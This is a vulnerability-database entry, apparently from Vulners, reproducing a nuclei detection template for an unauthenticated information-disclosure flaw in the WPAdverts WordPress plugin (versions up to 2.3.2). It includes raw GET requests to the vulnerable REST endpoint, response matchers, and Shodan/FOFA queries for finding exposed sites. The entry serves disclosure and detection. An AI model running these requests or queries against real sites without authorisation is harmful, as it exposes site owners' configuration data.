Lucene search
+L

WPAdverts <= 2.3.2 - Information Disclosure

🗓️ 24 Aug 2026 19:55:15Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 4 Views

Unauthenticated information disclosure in WPAdverts <= 2.3.2 via classifieds-types REST endpoint.

Related
Refs
Code
id: CVE-2026-11801

info:
  name: WPAdverts <= 2.3.2 - Information Disclosure
  author: 0x_Akoko
  severity: high
  description: |
    WPAdverts – Classifieds Plugin for WordPress <= 2.3.2 contains an authorization bypass caused by improper user authorization verification in classifieds-types REST endpoint, letting unauthenticated attackers retrieve internal site configuration data, exploit requires no authentication.
  impact: |
    Unauthenticated attackers can access internal site configuration data, potentially exposing sensitive information about the site setup.
  remediation: |
    Update to the latest version beyond 2.3.2.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/37bb8d68-dd87-437a-80e5-e99e93dc55b6
    - https://nvd.nist.gov/vuln/detail/CVE-2026-11801
    - https://plugins.trac.wordpress.org/changeset?reponame=&new=3635095%40wpadverts%2Ftrunk&old=3557928%40wpadverts%2Ftrunk
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2026-11801
    cwe-id: CWE-862
  metadata:
    verified: true
    max-request: 2
    vendor: developer
    product: wpadverts
    framework: wordpress
    shodan-query: http.html:"wp-content/plugins/wpadverts"
    fofa-query: body="wp-content/plugins/wpadverts"
  tags: cve,cve2026,wpadverts,wp,wordpress,wp-plugin,exposure

http:
  - raw:
      - |
        GET /wp-json/wpadverts/v1/classifieds-types HTTP/1.1
        Host: {{Hostname}}
      - |
        GET /?rest_route=/wpadverts/v1/classifieds-types HTTP/1.1
        Host: {{Hostname}}

    stop-at-first-match: true

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "json")'
          - 'contains_all(body, "\"form_schemes_default\"", "\"meta__adverts_email\"", "\"post_type\"", "\"data\"")'
        condition: and
# digest: 4a0a00473045022100ae504ab7ef09d9498fd7ecc558fe0df219679803c0b5687de9508ec40ed9938e02202f57dc2b4256711245c600e974c576cea2fb3f27596c1f84b5e1d72f74fe6841:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

20 Aug 2026 03:02Current
5.2Medium risk
Vulners AI Score5.2
CVSS 3.17.5
EPSS0.003
SSVC
4